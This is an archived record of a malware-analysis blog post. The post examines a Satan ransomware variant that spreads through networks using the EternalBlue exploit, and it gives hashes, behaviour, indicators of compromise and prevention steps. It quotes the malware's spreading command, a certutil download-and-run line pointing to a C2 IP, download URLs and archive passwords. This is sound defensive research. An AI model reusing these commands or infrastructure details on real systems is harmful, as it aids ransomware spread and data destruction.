{
	"id": "269c6fea-2f99-4e53-a0ad-aa981df2846d",
	"created_at": "2026-04-06T00:09:06.732048Z",
	"updated_at": "2026-04-10T03:20:28.709557Z",
	"deleted_at": null,
	"sha1_hash": "077276488ebc71d1b5d31428ef6a8833fbe140f8",
	"title": "Satan ransomware adds EternalBlue exploit",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 365686,
	"plain_text": "Satan ransomware adds EternalBlue exploit\r\nArchived: 2026-04-05 20:14:34 UTC\r\nToday, MalwareHunterTeam reached out to me about a possible new variant of Satan ransomware.\r\nSatan ransomware itself has been around since January 2017 as reported by Bleeping Computer.\r\nIn this blog post we'll analyse a new version of the infamous Satan ransomware, which since November 2017 has been using the EternalBlue exploit to spread via the network, and consequently encrypt files.\r\nAnalysis\r\nFirst up is a file inconspicuously named \"sts.exe\", which may refer to \"Satan spreader\".\r\nMD5: 12bc52fd9da66db3e63bfb196ceb9be6\r\nSHA1: 4508e3442673c149b31e3fffc29cc95f834975bc\r\nSHA256: b686cba1894f8ab5cec0ce5db195022def00204f6cd143a325608ec93e8b74ee\r\nCompilation timestamp: 2018-04-14 06:33:08\r\nVirusTotal report:\r\nb686cba1894f8ab5cec0ce5db195022def00204f6cd143a325608ec93e8b74ee\r\nThe file is packed with PECompact 2, and is therefore only 30KB in filesize.\r\nNotably, Satan has used different packers in multiple campaigns, for example, it has also used UPX and WinUpack.\r\nThis is possibly due to a packer option in the Satan RaaS builder. Fun fact: Iron ransomware, which may be a spin-off from Satan, has used VMProtect.\r\n\"sts.exe\" acts as a simple downloader, and will download two new files, both SFX archives, and extract them with a given password:\r\nFigure 1 - download and extract two new files\r\nBoth files will be downloaded from 198.55.107[.]149, and use a custom User-Agent \"RookIE/1.0\", which seems a rather unique User-Agent.\r\nms.exe has password: iamsatancryptor\r\nhttps://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html\r\nPage 1 of 6\n\nclient.exe has password: abcdefghijklmn\r\nIt appears the Satan ransomware developers showcase some sense of humor by using the password \"iamsatancryptor\". 
\r\nOnce the user has executed \"sts.exe\", they will get the following UAC prompt, if enabled:\r\nFigure 2 - UAC prompt\r\nClient.exe (94868520b220d57ec9df605839128c9b) is, as mentioned earlier, an SFX archive and will hold the actual Satan ransomware, named \"Cryptor.exe\". Figure 2 shows the command line options.\r\nCuriously, and thanks to the s2 option, the start dialog will be hidden, but the extraction progress is displayed - this means we need to click through to install the ransomware. Even more curious: the setup is in Chinese.\r\nFigure 3 - End of setup screen\r\nms.exe (770ddc649b8784989eed4cee10e8aa04) on the other hand will drop and load the EternalBlue exploit, and starts scanning for vulnerable hosts. Required files will be dropped in the C:\\ProgramData folder, as seen in Figure 3. Note it uses a publicly available implementation of the exploit - it does not appear to use its own.\r\nThe infection of other machines on the network will be achieved with the following command:\r\ncmd /c cd /D C:\\Users\\Alluse~1\\\u0026blue.exe --TargetIp \u0026 star.exe --OutConfig a --TargetPort 445 --Protocol SMB --Architecture x64 --Function RunDLL --DllPayload down64.dll --TargetIp \r\nWe can then see an attempt to spread the ransomware to other machines in the same network:\r\nFigure 4 - Spreading attempt over SMB, port 445\r\ndown64.dll (17f8d5aff617bb729fcc79be322fcb67) will be loaded in memory using DoublePulsar, and executes the following command:\r\ncmd.exe /c certutil.exe -urlcache -split -f http://198.55.107.149/cab/sts.exe c:/sts.exe\u0026c:\\sts.exe\r\nThis will be used for planting sts.exe on other machines in the network, and will consequently be executed.\r\nSatan ransomware itself, which is contained in Client.exe, will be dropped to C:\\Cryptor.exe.\r\nThis payload is also packed with PECompact 2. 
As usual, any database-related services and processes will be stopped and killed, which it does to also encrypt those files possibly in use by another process.\r\nFigure 5 - Database-related processes\r\nWhat's new in this version of Satan is that the exclusion list has changed slightly - it will not encrypt files with the following words in their path:\r\nwindows, python2, python3, microsoft games, boot, i386, ST_V22, intel, dvd maker, recycle, libs, all users, 360rec, 360sec, 360sand, favorites, common files, internet explorer, msbuild, public, 360downloads, windows defen, windows mail, windows media pl, windows nt, windows photo viewer, windows sidebar, default user\r\nThis exclusion list is reminiscent of Iron ransomware (or vice versa).\r\nSatan will, after encryption, automatically open the following ransom note: C:\\_How_to_decrypt_files.txt:\r\nFigure 6 - Ransom note\r\nThe note is, as usual, in English, Chinese and Korean, and demands that the user pay 0.3 BTC. Satan will prepend filenames with its email address, satan_pro@mail.ru, and append the extension .satan. For example: [satan_pro@mail.ru]Desert.jpg.satan\r\nBTC Wallet: 14hCK6iRXwRkmBFRKG8kiSpCSpKmqtH2qo\r\nEmail: satan_pro@mail.ru\r\nNote: _How_to_decrypt_files.txt\r\nSatan will create a unique mutex, SATANAPP, so the ransomware won't run twice. It will also generate a unique hardware ID and send this to the C2 server:\r\nGET /data/token.php?status=ST\u0026code=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.1\r\nConnection: Keep-Alive\r\nUser-Agent: Winnet Client\r\nHost: 198.55.107.149\r\nAs mentioned in the beginning of this blog post, Satan ransomware has been using EternalBlue since at least November 2017. 
For example, 25005f06e9b45fad836641b19b96f4b3 is another downloader which works similarly to what is posted in this blog. It would fetch the following files:\r\nhttp://122.114.9.220/data/client.exe\r\nhttp://122.114.9.220/data/ms.exe\r\nhttp://122.114.9.220/data/winlog.exe\r\nAccording to VirusTotal, the downloader file was uploaded:\r\n2017-11-20 18:35:17 UTC ( 5 months ago )\r\nFor additional reading, read this excellent post by Tencent, who discovered a similar variant using EternalBlue earlier in April this year.\r\nDisinfection\r\nYou may want to verify if any of the following files or folders exist:\r\nC:\\sts.exe\r\nC:\\Cryptor.exe\r\nC:\\ProgramData\\ms.exe\r\nC:\\ProgramData\\client.exe\r\nC:\\Windows\\Temp\\KSession\r\nPrevention\r\nEnable UAC\r\nEnable Windows Update, and install updates (especially verify that MS17-010 is installed)\r\nInstall an antivirus, and keep it up-to-date and running\r\nRestrict, where possible, access to shares (ACLs)\r\nCreate backups! (and test them)\r\nMore ransomware prevention can be found here.\r\nConclusion\r\nSatan is not the first ransomware to use EternalBlue (for example, WannaCry); however, it does appear the developers of Satan are continuously improving and adding features to their ransomware.\r\nPrevention is always better than disinfection/decryption.\r\nIOCs\r\nSource: https://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html"
	],
	"report_names": [
		"satan-ransomware-adds-eternalblue.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434146,
	"ts_updated_at": 1775791228,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/077276488ebc71d1b5d31428ef6a8833fbe140f8.pdf",
		"text": "https://archive.orkl.eu/077276488ebc71d1b5d31428ef6a8833fbe140f8.txt",
		"img": "https://archive.orkl.eu/077276488ebc71d1b5d31428ef6a8833fbe140f8.jpg"
	}
}